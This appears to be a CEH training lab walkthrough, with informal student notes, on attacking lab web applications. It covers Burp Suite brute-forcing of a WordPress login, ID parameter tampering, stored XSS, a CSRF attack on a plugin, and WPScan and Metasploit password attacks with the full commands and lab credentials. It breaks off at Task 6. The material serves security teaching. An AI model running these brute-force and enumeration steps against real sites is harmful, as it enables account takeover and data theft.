Lab 2: Perform Web Application Attacks

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 1: Perform a Brute-force Attack using Burp Suite

preform web application attacks

perform a brute-force attack using burp suite bruteforce

for this cenario go to http://10.10.10.16:8080/CEH/wp-login.php? 

you will be at a login page

in firefox go to prefrences 

scroll down press network settings

select manual proxy configuration

HTTP proxy: 127.0.0.1 port 8080

use this proxy server for all protocols checked

click ok

apps - pentesting - web app analysis - web app proxie - burpsuite

enter pass

temp project click next 

use burp defaults click start burp

click proxy tab

make sure intercept is on is selected it should be

go back to browser

type admin and password press login then go back to burp suite

right click the giant white window in burp suite and select send to intruder

at the bottom it should say log=admin&pwd=password and other stuff if not click intercept is on and off and on and try again 

with login

click on intruder tab 

click positions tab 

click the clear S button

select cluster bomb from the drop down menu where it says Attack type: 

highlight the username and press the add$ and highlight password and press add$

this will be the user and admin you tryied to log in with earlier 

go to payload tab

then click load

locate username.txt file  for this one its /home/attacker/desktop/cehv11 modle 14 username.txt

select payload 2 drop down from payload set from 1 to 2

do same thing but add passwords. 

top right click start attack

if this does not work go back and re try steps be sure you selected username and passwoord when doing the add$ button and

 on cluster 

wait for it to finish

In the Raw tab at the bottom, the HTTP request with a set of the correct credentials is displayed. (here, username=admin

 and password=qwerty@123), as shown in the screenshot. Note down these user credentials.

note the raw admin and password shown at the bottom in this case was admin and qwerty@123

if nothing shows up in the bottom scroll down and look for a status code of 302 or something diff from the others

go back to intercept is on button and turn it off

Switch to the browser window and perform Steps 5-7. Remove the browser proxy set up in Step 8, by selecting the No proxy 

radio-button in the Connection Settings window and click OK. Close the tab.

last few steps are pretty much you wrapping things up

done

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 2: Perform Parameter Tampering using Burp Suite

A web parameter tampering attack involves the manipulation of parameters exchanged between the client and server

 to modify application data such as user credentials and permissions, price, and quantity of products.

Here, we will use the Burp Suite tool to perform parameter tampering.

refer to blog  kinda long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

Parameter tampering is a simple form of attack aimed directly at an application’s business logic. A parameter tampering

 attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS or SQL injection

 exploitation.

XSS attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject

 client-side script into web pages viewed by other users. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML,

 or Flash code for execution on a victim’s system by hiding it within legitimate requests.

Although implementing a strict application security routine, parameters, and input validation can minimize parameter

 tampering and XSS vulnerabilities, many websites and web applications are still vulnerable to these security threats.

Attacking web applications through parameter tampering and XSS vulnerabilities is one of the steps an attacker takes 

in attempting to compromise a web application’s security. An expert ethical hacker and pen tester should be aware of 

the different parameter tampering and XSS methods that can be employed by an attacker to hack web applications.

Here, we will learn how to exploit parameter tampering and XSS vulnerabilities in the target web application

refer to blog  kinda long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 4: Perform Cross-site Request Forgery (CSRF) Attack

CSRF, also known as a one-click attack, occurs when a hacker instructs a user’s web browser to send a request to the 

vulnerable website through a malicious web page. Financial websites commonly contain CSRF vulnerabilities. Usually, 

outside attackers cannot access corporate intranets, so CSRF is one of the methods used to enter these networks. The

 inability of web applications to differentiate a request made using malicious code from a genuine request exposes 

it to the CSRF attack. These attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting

 user’s browser to send malicious requests that they did not intend.

CSRF attacks can be performed using various techniques and tools. Here, we will perform a CSRF attack using WPScan.

refer to blog  kinda long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 5: Enumerate and Hack a Web Application using WPScan and Metasploit

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool that 

includes hundreds of working remote exploits for a variety of platforms. It helps pen testers to verify vulnerabilities 

and manage security assessments.

In this task, we will perform multiple attacks on a vulnerable PHP website (WordPress) in an attempt to gain sensitive 

information such as usernames and passwords. You will also learn how to use the WPScan tool to enumerate usernames on a

 WordPress website, and how to crack passwords by performing a dictionary attack using an msf auxiliary module.

refer to blog  kinda long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is extremely vulnerable. The main objective of DVWA is 

to aid security professionals in testing their skills and tools in a legal environment, to help web developers better 

understand the processes of securing web applications, and to aid teachers and students in teaching and learning web 

application security in a classroom environment.

In this task, we will perform command-line execution on a vulnerability found in DVWA. Here, you will learn how to extract 

information about a target machine, create a user account, assign administrative privileges to the created account, and use

 that account to log in to the target machine.

refer to blog  kinda long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 7: Exploit a File Upload Vulnerability at Different Security Levels

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It is a 

Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains

 a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade 

detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore

 the target machine and execute code.

Here, we will use exploit a file upload vulnerability at different security levels of DVWA using Metasploit.

refer to blog  super super long RIP long good luck on test long goodby 6 hours long

---------------------------------------------------------------------------------------------------------------------------------------

Module 14: Hacking Web Applications

Lab 2: Perform Web Application Attacks

Task 8: Gain Backdoor Access via a Web Shell using Weevely

Gaining backdoor access refers to entering a website in a stealthy way. These Backdoors are often installed via some 

unvalidated uploads. This vulnerability allows you to upload harmful files to the target web server. Websites that are 

developed using PHP are often susceptible to this kind of attack.

A professional ethical hacker or pen tester can use tools such as Weevely to gain backdoor access to a website without 

being traced. Weevely is used to develop a backdoor shell and upload it to a target server in order to gain remote shell 

access. This tool also helps in performing administrative tasks, maintaining persistence, and spreading backdoors across 

the target network.

Here, we will gain backdoor access via a web shell using Weevely.

refer to blog  little long

---------------------------------------------------------------------------------------------------------------------------------------

Lab Scenario

For an ethical hacker or pen tester, the next step after gathering required information about the target web application is to attack the web application. They must have the required knowledge to perform web application attacks to test the target network’s web application security infrastructure.

Attackers perform web application attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of the web application and steal sensitive information for financial gain or for curiosity’s sake. To hack the web app, first, the attacker analyzes it to determine its vulnerable areas. Next, they attempt to reduce the “attack surface.” Even if the target web application only has a single vulnerability, attackers will try to compromise its security by launching an appropriate attack. They try various application-level attacks such as injection, XSS, broken authentication, broken access control, security misconfiguration, and insecure deserialization to compromise the security of web applications to commit fraud or steal sensitive information.

An ethical hacker or pen tester must test their company’s web application against various attacks and other vulnerabilities. They must find various ways to extend the security test and analyze web applications, for which they employ multiple testing techniques. This will help in predicting the effectiveness of additional security measures in strengthening and protecting web applications in the organization.

The tasks in this lab will assist in performing attacks on web applications using various techniques and tools.

Lab Objectives

• Perform a brute-force attack using Burp Suite
• Perform parameter tampering using Burp Suite
• Exploit parameter tampering and XSS vulnerabilities in web applications
• Perform cross-site request forgery (CSRF) attack
• Enumerate and hack a web application using WPScan and Metasploit
• Exploit a remote command execution vulnerability to compromise a target web server
• Exploit a file upload vulnerability at different security levels
• Gain backdoor access via a web shell using Weevely

Overview of Web Application Attacks

One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, OSes, networks, and security. All the mechanisms or services employed at each layer help the user in one way or another to access the web application securely. When talking about web applications, the organization considers security to be a critical component, because web applications are major sources of attacks. Attackers make use of vulnerabilities to exploit and gain unrestricted access to the application or the entire network. Attackers try various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information.

Task 1: Perform a Brute-force Attack using Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. It has various tools that work together to support the entire testing process from the initial mapping and analysis of an application’s attack surface to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, and sequencer tool.

Here, we will perform a brute-force attack on the target website using Burp Suite.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by the victim machine, Windows Server 2016. Keep this machine running until the end of the task. Here, the host machine is the Parrot Security machine.

1. Click Parrot Security to switch to the Parrot Security machine.

2. Click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.

3. The Mozilla Firefox window appears; type http://10.10.10.16:8080/CEH/wp-login.php? Into the address bar and press Enter.

   Here, we will perform a brute-force attack on the designated WordPress website hosted by the Windows Server 2016 machine.

   

4. Now, we shall set up a Burp Suite proxy by first configuring the proxy settings of the browser.

5. In the Mozilla Firefox browser, click the Open menu icon in the right corner of the menu bar and select Preferences from the list.

   

6. The General settings tab appears. In the Find in Preferences search bar, type proxy, and press Enter.

7. The Search Results appear. Click the Settings button under the Network Settings option.

   

8. The Connection Settings window appears; select the Manual proxy configuration radio button and specify the HTTP Proxy as 127.0.0.1 and the Port as 8080. Tick the Use this proxy server for all protocols checkbox and click OK. Close the Preferences tab and minimize the browser window.

   

9. Now, minimize the browser window, click the Applications menu form the top left corner of Desktop, and navigate to Pentesting --> Web Application Analysis --> Web Application Proxies --> burpsuite to launch the Burp Suite application.

   

10. A security pop-up appears, enter the password as toor in the Password field and click OK.

    

11. In the next Burp Suite Community Edition notification, click OK.

    

12. In the Terms and Conditions wizard, click the I Accept button.

    If Delete old temporary files? pop-up appears, click Delete.

13. The Burp Suite main window appears; ensure that the Temporary project radio button is selected and click the Next button, as shown in the screenshot.

    If an update window appears, click Close.

    

14. In the next window, select the Use Burp defaults radio-button and click the Start Burp button.

    

15. The Burp Suite main window appears; click the Proxy tab from the available options in the top section of the window.

    

16. In the Proxy settings, by default, the Intercept tab opens-up. Observe that by default, the interception is active as the button says Intercept is on. Leave it running.

    Turn the interception on if it is off.

    

17. Switch back to the browser window. On the login page of the target WordPress website, type random credentials, here admin and password. Click the Log In button.

    You can enter the credentials of your choice here.

    

18. Switch back to the Burp Suite window; observe that the HTTP request was intercepted by the application.

19. Now, right-click anywhere on the HTTP request window, and from the context menu, click Send to Intruder.

    Observe that Burp Suite intercepted the entered login credentials.

    If you do not get the request as shown in the screenshot, then press the Forward button.

    

20. Now, click on the Intruder tab from the toolbar and observe that under the Intruder tab, the Target tab appears by default.

21. Observe the target host and port values in the Host and Port fields.

    

22. Click on the Positions tab under the Intruder tab and observe that Burp Suite sets the target positions by default, as shown in the HTTP request. Click the Clear § button from the right-pane to clear the default payload values.

    

23. Once you clear the default payload values, select Cluster bomb from the Attack type drop-down list.

    Cluster bomb uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates through each payload set in turn so that all permutations of payload combinations are tested. For example, if there are two payload positions, the attack will place the first payload from payload set 2 into position 2 and iterate through all payloads in payload set 1 in position 1; it will then place the second payload from payload set 2 into position 2 and iterate through all the payloads in payload set 1 in position 1.

    more...

    

24. Now, we will set the username and password as the payload values. To do so, select the username value entered in Step 17 and click Add § from the left-pane.

25. Similarly, select the password value entered in Step 17 and click Add § from the left-pane.

    Here, the username and password are admin and password.

    

26. Once the username and password payloads are added. The symbol ‘§’ will be added at the start and end of the selected payload values. Here, as the screenshot shows, the values are admin and password.

    

27. Navigate to the Payloads tab under the Intruder tab and ensure that under the Payload Sets section, the Payload set is selected as 1, and the Payload type is selected as Simple list.

28. Under the Payload Options [Simple list] section, click the Load… button.

    

29. A file selection window appears; navigate to the location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web Applications/Wordlist, select the username.txt file, and click the Open button.

    

30. Observe that the selected username.txt file content appears under the Payload Options [Simple list] section, as shown in the screenshot.

    

31. Similarly, load a password file for the payload set 2. To do so, under the Payload Sets section, select the Payload set as 2 from the drop-down options and ensure that the Payload type is selected as Simple list.

32. Under the Payload Options [Simple list] section, click the Load… button.

    

33. A file selection window appears; navigate to the location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web Applications/Wordlist, select the password.txt file, and click the Open button.

    

34. Observe that selected password.txt file content appears under the Payload Options [Simple list] section, as shown in the screenshot.

    

35. Once the wordlist files are selected as payload values, click the Start attack button to launch the attack.

    

36. A Burp Intruder notification appears. Click OK to proceed.

    

37. The Intruder attack 1 window appears as the brute-attack initializes. It displays various username-password combinations along with the Length of the response and the Status.

38. Wait for the progress bar at the bottom of the window to complete.

    

39. After the progress bar completes, scroll down and observe the different values of Status and Length. Here, Status=302 and Length= 1105.

    Different values of Status and Length indicate that the combination of the respective credentials is successful.

    The values might differ in your lab environment.

40. In the Raw tab under the Request tab, the HTTP request with a set of the correct credentials is displayed. (here, username=admin and password=qwerty@123), as shown in the screenshot. Note down these user credentials.

    

41. Now, that you have obtained the correct user credentials, close the Intruder attack 1 window.

    If a Warning pop-up appears, click OK.

42. Navigate back to the Proxy tab and click the Intercept is on button to turn off the interception. The Intercept is on button toggles to Intercept is off, indicating that the interception is off.

    

43. Switch to the browser window and perform Steps 5-7. Remove the browser proxy set up in Step 8, by selecting the No proxy radio-button in the Connection Settings window and click OK. Close the tab.

    

44. Reload the target website http://10.10.10.16:8080/CEH/wp-login.php?, enter the Username and Password obtained in Step 40 and click Log In.

    Here, the username and password are admin and qwerty@123.

    If a pop-up appears, click Resend.

45. You are successfully logged in using the brute-forced credentials. The Welcome to WordPress! Page appears, as shown in the screenshot.

    

46. This concludes the demonstration of how to perform a brute-force attack using Burp Suite.

47. Close all open windows and document all the acquired information.

---

Task 2: Perform Parameter Tampering using Burp Suite

A web parameter tampering attack involves the manipulation of parameters exchanged between the client and server to modify application data such as user credentials and permissions, price, and quantity of products.

Here, we will use the Burp Suite tool to perform parameter tampering.

In this task, the target website (www.moviescope.com) is hosted by the victim machine, Windows Server 2019. Here, the host machine is the Parrot Security machine.

1. In Parrot Security machine click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.

2. The Mozilla Firefox window appears; type http://www.moviescope.com Into the address bar and press Enter.

   

3. Now, set up a Burp Suite proxy by first configuring the proxy settings of the browser.

4. In the Mozilla Firefox browser, click the Open menu icon in the right corner of the menu bar and select Preferences from the list.

   

5. The General settings tab appears. In the Find in Preferences search bar, type proxy, and press Enter.

6. The Search Results appear. Click the Settings button under the Network Settings option.

   

7. A Connection Settings window appears. Select the Manual proxy configuration radio button and click OK. Close the Preferences tab.

   

8. Now, minimize the browser window, click the Applications menu form the top left corner of Desktop, and navigate to Pentesting --> Web Application Analysis --> Web Application Proxies --> burpsuite to launch the Burp Suite application.

   

9. A security pop-up appears, enter the password as toor in the Password field and click OK.

   

10. In the next Burp Suite Community Edition notification, click OK.

    

11. Burp Suite initializes. If a Burp Suite Community Edition notification saying An update is available appears, click Close.

12. The Burp Suite main window appears; ensure that the Temporary project radio button is selected and click the Next button, as shown in the screenshot.

    If an update window appears, click Close.

    

13. In the next window, select the Use Burp defaults radio-button and click the Start Burp button.

    

14. The Burp Suite main window appears; click the Proxy tab from the available options in the top section of the window.

    

15. In the Proxy settings, by default, the Intercept tab opens-up. Observe that by default, the interception is active as the button says Intercept is on. Leave it running.

    Turn the interception on if it is off.

    

16. Switch back to the browser window, and on the login page of the target website (www.moviescope.com), enter the credentials sam and test. Click the Log In button.

    Here, we are logging in as a registered user on the website.

    

17. Switch back to the Burp Suite window and observe that the HTTP request was intercepted by the application.

    You can observe that the entered login credentials were intercepted by the Burp Suite.

18. Now, keep clicking the Forward button until you are logged into the user account.

    

19. Switch to the browser, and observe that you are now logged into the user account, as shown in the screenshot.

20. Now, click the View Profile tab from the menu bar to view the user information.

    

21. After clicking the View Profile tab, switch back to the Burp Suite window and keep clicking the Forward button until you get the HTTP request, as shown in the screenshot.

22. Now, navigate to the Params tab under the Intercept tab to view the captured parameters.

    

23. Under the Params tab, observe a table with captured values such as URL and Cookie.

24. In the URL type with the name id, double-click the Value column to change it from 1 to 2, as shown in the screenshot.

    

25. After changing the value, navigate back to the Raw tab.

    

26. In the Raw tab, click the Intercept is on button to turn off the interception.

    

27. After switching off the interception, navigate back to the browser window and observe that the user account associated with ID=2 appears with the name John, as shown in the screenshot.

    Although we logged in using sam as a username with ID=1, using Burp Suite, we successfully tampered with the ID parameter to obtain information about other user accounts.

    

28. Similarly, you can edit the id parameter in Burp Suite with any random numeric value to view information about other user accounts.

29. Switch to the browser window and perform Steps 4-6. Remove the browser proxy set up in Step 7, by selecting the No proxy radio-button in the Connection Settings window and click OK. Close the tab.

    

30. This concludes the demonstration of how to perform parameter tampering using Burp Suite.

31. Close all open windows and document all the acquired information.

---

Task 3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

Parameter tampering is a simple form of attack aimed directly at an application’s business logic. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS or SQL injection exploitation.

XSS attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash code for execution on a victim’s system by hiding it within legitimate requests.

Although implementing a strict application security routine, parameters, and input validation can minimize parameter tampering and XSS vulnerabilities, many websites and web applications are still vulnerable to these security threats.

Attacking web applications through parameter tampering and XSS vulnerabilities is one of the steps an attacker takes in attempting to compromise a web application’s security. An expert ethical hacker and pen tester should be aware of the different parameter tampering and XSS methods that can be employed by an attacker to hack web applications.

Here, we will learn how to exploit parameter tampering and XSS vulnerabilities in the target web application.

In this task, the target website (www.moviescope.com) is hosted by the victim machine Windows Server 2019. Here, the host machine is the Windows 10 machine.

1. Click Windows 10 to switch to the Windows 10 machine.

2. Launch any browser, in this lab we are using Mozilla Firefox. In the address bar of the browser place your mouse cursor and click http://www.moviescope.com and press Enter.

3. The MovieScope website appears. In the Login form, type Username and Password as steve and password, and click Login.

   Here, we are logging in as a registered user on the website.

   

4. You are logged into the website. Click the View Profile tab from the menu bar.

   

5. You will be redirected to the profile page, which displays the personal information of steve (here, you). You will observe that the value of ID in the personal information and address bar is 4.

   

6. Now, try to change the parameter in the address bar to id=1 and press Enter.

7. You will be redirected to the profile of sam without having to perform any hacking techniques to explore the database. Here, you can observe Sam’s personal information under the View Profile tab, as shown in the screenshot.

   

8. Now, try the parameter id=3 in the address bar and press Enter.

9. You get the profile for kety. This way, you can change the id number and obtain profile information for different users.

   This process of changing the ID value and getting the result is known as parameter tampering. Web XSS attacks exploit vulnerabilities on dynamically generated web pages. This enables malicious attackers to inject client-side scripts into the web pages viewed by other users.

   

10. Now, click the Contacts tab. Here you will be performing an XSS attack.

    

11. The Contacts page appears; enter your name or any random name (here, steve) in the Name field; enter the cross-site script as shown in the screenshot in the Comment field and click the Submit Comment button.

    

12. On this page, you are testing for XSS vulnerability. Now, refresh the Contacts page.

    If a notification appears saying To display this page, Firefox must send information…, click the Resend button.

    

13. You have successfully added a malicious script to this page. The comment with the malicious link is stored on the server.

14. Click Windows Server 2019 to switch to the Windows Server 2019 machine. Click Ctrl+Alt+Delete to activate the machine, by default, Administrator account is selected, click Pa$$w0rd to enter the password and press Enter.

    

15. Launch any browser, in this lab we are using Google Chrome. In the address bar of the browser place your mouse cursor and click http://www.moviescope.com and press Enter.

16. The MovieScope website appears. In the Login form, type the Username and Password as sam and test and click Login.

    Here, we are logging in as the victim.

    

17. You are logged into the website as a legitimate user. Click the Contacts tab from the menu bar.

    

18. As soon as you click the Contacts tab, the cross-site script running on the backend server is executed, and a pop-up appears, stating, You are hacked.

    

19. Similarly, whenever a user attempts to visit the Contacts page, the alert pops up as soon as the page is loaded.

20. This concludes the demonstration of how to exploit parameter tampering and XSS vulnerabilities in web applications.

21. Close all open windows and document all the acquired information.

---

Task 4: Perform Cross-site Request Forgery (CSRF) Attack

CSRF, also known as a one-click attack, occurs when a hacker instructs a user’s web browser to send a request to the vulnerable website through a malicious web page. Financial websites commonly contain CSRF vulnerabilities. Usually, outside attackers cannot access corporate intranets, so CSRF is one of the methods used to enter these networks. The inability of web applications to differentiate a request made using malicious code from a genuine request exposes it to the CSRF attack. These attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user’s browser to send malicious requests that they did not intend.

CSRF attacks can be performed using various techniques and tools. Here, we will perform a CSRF attack using WPScan.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by the victim machine Windows Server 2016. Here, the host machine is the Parrot Security machine.

1. Click Windows Server 2016 to switch to the Windows Server 2016 machine.

   

2. Click Ctrl+Alt+Delete to activate the machine, by default, CEH\Administrator account is selected, click Pa$$w0rd to enter the password and press Enter.

   

3. Now, in the right corner of Desktop, click the Show hidden icons icon, observe that the WampServer icon appears.

4. Wait for this icon to turn green, which indicates that the WampServer is successfully running.

   

5. Now, open any web browser (here, Mozilla Firefox). In the address bar place your mouse cursor, click http://10.10.10.16:8080/CEH/wp-login.php? and press Enter.

   Here, we are opening the above-mentioned website as the victim.

6. A WordPress webpage appears. Type Username or Email Address and Password as admin and qwerty@123. Click the Log In button.

   

7. Assume that you have installed and configured the Firewall plugin for this site and that you want to check the security configurations.

8. Hover your mouse cursor on Plugins in the left pane and click Installed Plugins, as shown in the screenshot.

   

9. In the Plugins page, observe that leenk.me is installed. Click Activate under the leenk.me plugin to activate the plugin.

   

10. Refresh the page and you will observe that the leenk.me plugin option appears in the left pane; click it.

    Refresh the page if leenk.me does not appear on the left pane.

11. The leenk.me General Settings page appears. Tick the Facebook checkbox in the Choose which social network modules you want to enable for this site option under the Administrator Options section and click the Save Settings button.

12. The leenk.me General Settings page appears, as shown in the screenshot. Ensure that under the Administrator Options section, the Facebook checkbox is selected in the Choose which social network modules you want to enable for this site option and click the Facebook Settings hyperlink.

    

13. A Facebook Settings page appears; under Message Settings, enter the details below:

    • Default Message: This is CEH lab.
    • Default Link Name: CEH.com
    • Default Caption: CEH Labs

14. Clear the Default Description text field. Leave the other settings to default and click the Save Settings button to save the settings.

    

15. Click Parrot Security to switch to the Parrot Security machine.

16. Click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.

17. The Mozilla Firefox window appears. Type https://wpscan.com/register into the address bar and press Enter.

18. A webpage with a Register new user form appears; scroll down and in the Required fields enter your personal details. Check By ticking this box you agree to our terms checkbox..

    

19. Now, scroll down to the end of the page, click I'm not a robot and click on Register button.

    If Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

    

20. A notification saying A message with a confirmation link has been sent to your email address….

21. Now, open a new tab in the Firefox browser and open the email account you gave while registering as a new user in Step 18.

22. Once you are logged into your email account, open the email from noreply@wpscan.com, and in the email, click the Confirm my account hyperlink.

    

23. A new webpage appears with a message saying Your email address has been successfully confirmed. Enter the same details in the Email Address and Password fields that you provided in Step 18.

    If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

    

24. You get signed in successfully in the website. Now, click the Free usage button under the Choose a plan section.

    

25. The Edit Profile page appears; in the API Token section and observe the API Token. Note down or copy this API Token; we will use this token in the later steps.

    

26. Close the Firefox browser window.

27. Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.

    

28. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

29. In the [sudo] password for attacker field, type toor as a password and press Enter.

    The password that you type will not be visible.

30. Now, type cd and press Enter to jump to the root directory.

    

31. In the Terminal window, type wpscan --api-token [API Token from Step#25] --url http://10.10.10.16:8080/CEH --plugins-detection aggressive --enumerate vp and press Enter.

    --enumerate vp: specifies the enumeration of vulnerable plugins.

    

32. The result appears, displaying detailed information regarding the target website.

    

33. Scroll down to the Plugin(s) Identified section, and observe the installed vulnerable plugins (akismet and leenkme) on the target website.

34. In this task, we will exploit the CSRF vulnerability present in the leenkme plugin.

    

35. Minimize the Terminal window. Click the Places menu at the top of Desktop and click Desktop from the drop-down options.

    

36. The Desktop window appears, copy Security_Script.html file.

    

37. Click the Places menu at the top of Desktop and click Network from the drop-down options.

    

38. The Network window appears; press the Ctrl+L keys. A Location field appears; type smb://10.10.10.10 and press Enter to access the Windows 10 shared folders.

    

39. A security pop-up appears; enter the Windows 10 machine credentials (Username: Admin and Password: Pa$$w0rd) and click Connect.

    

40. The Windows shares on 10.10.10.10 window appears; double-click the CEH-Tools folder.

    

41. Navigate to CEHv11 Module 14 Hacking Web Applications and paste Security_Script.html script.

    

42. Click Windows Server 2016 to switch to the Windows Server 2016 machine Click Ctrl+Alt+Delete to activate the machine, by default, CEH\Administrator account is selected, click Pa$$w0rd to enter the password and press Enter.

    

43. Navigate to the location Z:\CEHv11 Module 14 Hacking Web Applications (shared network drive), copy the Security_Script.html file, and paste it onto Desktop.

    

44. Right-click the Security_Script.html file and navigate to Open with --> Firefox.

    You should use the same browser that was used in Step 5.

    

45. The Security_Script.html file opens up in the Mozilla Firefox browser, along with a pop-up; click OK to continue.

    

46. You will be redirected to the Facebook Settings page of the leenk.me plugin page. Observe that the field values have been changed, indicating a successful CSRF attack on the website, as shown in the screenshot.

    

47. This concludes the demonstration of how to perform a CSRF attack on a target website.

48. Close all open windows on both the machines (Window Server 2016 and Parrot Security) and document all the acquired information.

---

Task 5: Enumerate and Hack a Web Application using WPScan and Metasploit

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms. It helps pen testers to verify vulnerabilities and manage security assessments.

In this task, we will perform multiple attacks on a vulnerable PHP website (WordPress) in an attempt to gain sensitive information such as usernames and passwords. You will also learn how to use the WPScan tool to enumerate usernames on a WordPress website, and how to crack passwords by performing a dictionary attack using an msf auxiliary module.

1. Click Parrot Security to switch to the Parrot Security machine.

2. Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.

   

3. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

   If a Question pop-up window appears, asking for you to update the machine, click No to close the window.

4. In the [sudo] password for attacker field, type toor as a password and press Enter.

   The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.

   

6. In the Terminal window, type wpscan --api-token [API Token] --url http://10.10.10.16:8080/CEH --enumerate u and press Enter.

   --enumerate u: specifies the enumeration of usernames.

   Here, we will use the API token that we obtained by registering with the https://wpscan.com/register website.

   

7. WPScan begins to enumerate the usernames stored in the website’s database. The result appears, displaying detailed information from the target website.

8. Scroll down to the User(s) Identified section and observe the information regarding the available user accounts.

   

9. Now that you have successfully obtained the usernames stored in the database, you need to find their passwords.

10. To obtain the passwords, you will use the auxiliary module called wordpress_login_enum (in msfconsole) to perform a dictionary attack using the password.txt file (in the Wordlist folder) which you copied to the location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web Applications.

11. To use the wordpress_login_enum auxiliary module, you need to first launch msfconsole. However, before this, you need to start the PostgreSQL service.

12. In the terminal window, type service postgresql start and press Enter to start the PostgreSQL service.

    

13. Type msfconsole and press Enter to launch the Metasploit framework.

14. In msfconsole, type use auxiliary/scanner/http/wordpress_login_enum and press Enter.

    

15. This module allows you to enumerate the login credentials.

16. To know all options available to configure in this Metasploit module, type show options, and press Enter.

17. This provides a list of options that can be set for this module. As we must obtain the password for the target user account, we will set the below options:

    • PASS_FILE: Sets the password.txt file, using which; you will perform the dictionary attack
    • RHOST: Sets the target machine (here, the Windows Server 2016 IP address)
    • RPORT: Sets the target machine port (here, the Windows Server 2016 port)
    • TARGETURI: Sets the base path to the WordPress website (here, http://[IP Address of Windows Server 2016]:8080/CEH]
    • USERNAME: Sets the username that was obtained in Step 8. (here, admin)

    

18. Now, in the msfconsole, type the below commands:

    • Type set PASS_FILE /home/attacker/Desktop/CEHv11 Module 14 Hacking Web Applications/Wordlist/password.txt and press Enter to set the file containing the passwords. (here, we are using the password.txt password file).
    • Type set RHOSTS [IP Address of Windows Server 2016] (here, 10.10.10.16) and press Enter to set the target IP address. (Here, the IP address of Windows Server 2016 is 10.10.10.16).
    • Type set RPORT 8080 and press Enter to set the target port.
    • Type set TARGETURI http://[IP Address of Windows Server 2016]:8080/CEH and press Enter to set the base path to the WordPress website (Here, the IP address of Windows Server 2016 is 10.10.10.16).
    • Type set USERNAME admin and press Enter to set the username as admin.

    You may issue any one of the usernames that you have obtained during the enumeration process in Step 8. In this task, the admin user is being issued.

    

19. All the options have successfully been set. Type run and press Enter to execute the auxiliary module.

20. Observe that the auxiliary module initially enumerates details such as the ID number and the stored location of the username admin, and then begins to brute-force the login credentials by trying various passwords for the given username.

    

21. The auxiliary module tests various passwords against the given username (admin) and the cracked password is displayed, as shown in the screenshot.

    Here, the cracked password is qwerty@123, which might differ in your lab environment.

    

22. Now, use the obtained username-password combination to log into the WordPress website. (Here, Username: admin and Password: qwerty@123).

23. Now, click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.

24. In the address field, type http://[IP Address of Windows Server 2016]:8080/CEH/wp-login.php in the address bar and click the Log In button.

    If a Would you like Firefox to save this login notification appears at the top of the browser window, click Don’t Save.

    

25. Observe that you are successfully logged into the target WordPress website (http://10.10.10.16:8080/CEH) and that you can see the website content.

    

26. Similarly, you can crack the passwords of other users by firstly selecting a particular username from Step 8, and then perform Steps 12-21.

27. This concludes the demonstration of how to enumerate and hack a web application using WPScan and Metasploit.

28. Close all open windows on both the machines (Windows Server 2016 and Parrot Security) and document all the acquired information.

---

Task 6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is extremely vulnerable. The main objective of DVWA is to aid security professionals in testing their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers and students in teaching and learning web application security in a classroom environment.

